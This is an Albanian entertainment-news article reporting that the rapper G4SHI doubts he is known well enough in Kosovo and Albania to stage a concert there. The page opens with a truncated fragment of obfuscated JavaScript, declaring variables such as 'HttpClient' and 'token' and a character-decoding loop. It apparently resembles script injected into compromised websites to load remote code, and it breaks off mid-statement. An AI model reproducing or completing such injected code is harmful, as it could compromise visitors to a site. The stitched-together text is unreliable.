;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

G4SHI ‘frikësohet’ se njerëzit në Kosovë e Shqipëri nuk e njohin!

By

G4SHI, reperi shqiptar që jeton në Amerikë po vazhdon me punët dhe përpjekjet e tij për të kapur suksesin.

Këngët që po i publikon kohë pas kohe, po pëlqehen nga fansat. Madje, G4SHI është përfshirë edhe në modë duke bashkëpunuar me emra të famshëm përtej oqeani për linja të veshjeve dhe aksesorëve.

Debutimin në trojet shqiptare në një formë e bëri me duetin me Adelina Ismailin në vitin 2014, por siç duket kjo nuk i ka mjaftuar për t’u ndjerë i sigurt për të zhvilluar koncert në trojet shqipfolëse.

Përmes një postimi në rrjete sociale G4SHI ka shkruar: ‘Më duhet të bëj një koncert në Kosovë/Shqipëri por nuk ndjej se mjaftueshëm persona e njohin G4SHI-n atje’.

Nuk dihet nëse këtë postim ai e ka bërë për të matur pëlqyeshmërinë, por reperi definitivisht duhet të komplimentohet për sinqeritetin, që në ditët e sotme, mungon me të madhe. /Prive.al/

 

Artikuj të ngjashëm